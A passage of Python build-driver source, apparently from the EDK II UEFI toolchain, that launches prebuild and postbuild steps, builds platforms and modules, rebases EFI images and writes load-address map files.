Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.name = "STDOUT-Redirector"
StdOutThread.daemon = False
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.name = "STDERR-Redirector"
StdErrThread.daemon = False
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = [l.split("=", 1) for l in envs ]
envs = [[I.strip() for I in item] for item in envs if len(item) == 2]
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.name = "STDOUT-Redirector"
StdOutThread.daemon = False
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.name = "STDERR-Redirector"
StdErrThread.daemon = False
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand=None, PcdMaList=None):
if AutoGenObject is None:
return False
if FfsCommand is None:
FfsCommand = {}
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
mqueue = mp.Queue()
for m in AutoGenObject.GetAllModuleInfo:
mqueue.put(m)
mqueue.put((None,None,None,None,None,None,None))
AutoGenObject.DataPipe.DataContainer = {"CommandTarget": self.Target}
AutoGenObject.DataPipe.DataContainer = {"Workspace_timestamp": AutoGenObject.Workspace._SrcTimeStamp}
AutoGenObject.CreateLibModuelDirs()
AutoGenObject.DataPipe.DataContainer = {"LibraryBuildDirectoryList":AutoGenObject.LibraryBuildDirectoryList}
AutoGenObject.DataPipe.DataContainer = {"ModuleBuildDirectoryList":AutoGenObject.ModuleBuildDirectoryList}
AutoGenObject.DataPipe.DataContainer = {"FdsCommandDict": AutoGenObject.Workspace.GenFdsCommandDict}
self.Progress.Start("Generating makefile and code")
data_pipe_file = os.path.join(AutoGenObject.BuildDir, "GlobalVar_%s_%s.bin" % (str(AutoGenObject.Guid),AutoGenObject.Arch))
AutoGenObject.DataPipe.dump(data_pipe_file)
cqueue = mp.Queue()
autogen_rt,errorcode = self.StartAutoGen(mqueue, AutoGenObject.DataPipe, self.SkipAutoGen, PcdMaList, cqueue)
AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
with open(AutoGenIdFile,"w") as fw:
fw.write("Arch=%s\n" % "|".join((AutoGenObject.Workspace.ArchList)))
fw.write("BuildDir=%s\n" % AutoGenObject.Workspace.BuildDir)
fw.write("PlatformGuid=%s\n" % str(AutoGenObject.Guid))
self.Progress.Stop("done!")
if not autogen_rt:
self.AutoGenMgr.TerminateWorkers()
self.AutoGenMgr.join(1)
raise FatalError(errorcode)
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(True)
AutoGenObject.CreateMakeFile(True)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# run
if Target == 'run':
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
return True
# build library
if Target == 'libraries':
DirList = []
for Lib in AutoGenObject.LibraryAutoGenList:
if not Lib.IsBinaryModule:
DirList.append((os.path.join(AutoGenObject.BuildDir, Lib.BuildDir),Lib))
for Lib, LibAutoGen in DirList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, self.MakeFileName)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,LibAutoGen)
return True
# build module
if Target == 'modules':
DirList = []
for Lib in AutoGenObject.LibraryAutoGenList:
if not Lib.IsBinaryModule:
DirList.append((os.path.join(AutoGenObject.BuildDir, Lib.BuildDir),Lib))
for Lib, LibAutoGen in DirList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, self.MakeFileName)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,LibAutoGen)
DirList = []
for ModuleAutoGen in AutoGenObject.ModuleAutoGenList:
if not ModuleAutoGen.IsBinaryModule:
DirList.append((os.path.join(AutoGenObject.BuildDir, ModuleAutoGen.BuildDir),ModuleAutoGen))
for Mod,ModAutoGen in DirList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, self.MakeFileName)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,ModAutoGen)
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, self.MakeFileName))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, self.MakeFileName))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, self.MakeFileName))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(True)
AutoGenObject.CreateMakeFile(True)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
return True
# genfds
if Target == 'fds':
if GenFdsApi(AutoGenObject.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
Threshold = self.GetFreeSizeThreshold()
if Threshold:
self.CheckFreeSizeThreshold(Threshold, AutoGenObject.FvDir)
return True
# run
if Target == 'run':
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect function address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.append('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.append('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.append('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.append('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.append('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.append('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add function address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.append(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.append(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile(r"\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.append(Line)
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.append('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K size in SMRAM to make SMM module address not from 0.
SmmSize = 0x1000
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
RtModuleList[Module.MetaFile] = ImageInfo
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize // 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.append('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize // 0x1000))
MapBuffer.append('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize // 0x1000))
MapBuffer.append('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize // 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.append('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize // 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.append('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Map file path is got.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, ''.join(MapBuffer), False)
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
for Arch in Wa.ArchList:
PcdMaList = []
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if Ma is None:
continue
if Ma.PcdIsDriver:
Ma.PlatformInfo = Pa
Ma.Workspace = Wa
PcdMaList.append(Ma)
self.BuildModules.append(Ma)
Pa.DataPipe.DataContainer = {"FfsCommand":CmdListDict}
Pa.DataPipe.DataContainer = {"Workspace_timestamp": Wa._SrcTimeStamp}
self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict,PcdMaList=PcdMaList)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
self.CreateGuidedSectionToolsFile(Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
GlobalData.file_lock = mp.Lock()
GlobalData.FfsCmd = CmdListDict
self.Progress.Stop("done!")
MaList = []
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if Ma is None:
continue
if Ma.PcdIsDriver:
Ma.PlatformInfo = Pa
Ma.Workspace = Wa
MaList.append(Ma)
if GlobalData.gUseHashCache and not GlobalData.gBinCacheDest and self.Target in [None, "", "all"]:
if Ma.CanSkipbyPreMakeCache():
continue
else:
self.PreMakeCacheMiss.add(Ma)
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
self.Progress.Start("Generating code")
Ma.CreateCodeFile(True)
self.Progress.Stop("done!")
if self.Target == "genc":
return True
if not self.SkipAutoGen or self.Target == 'genmake':
self.Progress.Start("Generating makefile")
if CmdListDict and self.Fdf and (Module.Path, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.Path, Arch])
del CmdListDict[Module.Path, Arch]
else:
Ma.CreateMakeFile(True)
self.Progress.Stop("done!")
if self.Target == "genmake":
return True
if GlobalData.gBinCacheSource and self.Target in [None, "", "all"]:
if Ma.CanSkipbyMakeCache():
continue
else:
self.MakeCacheMiss.add(Ma)
self.BuildModules.append(Ma)
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
if not Ma.IsBinaryModule:
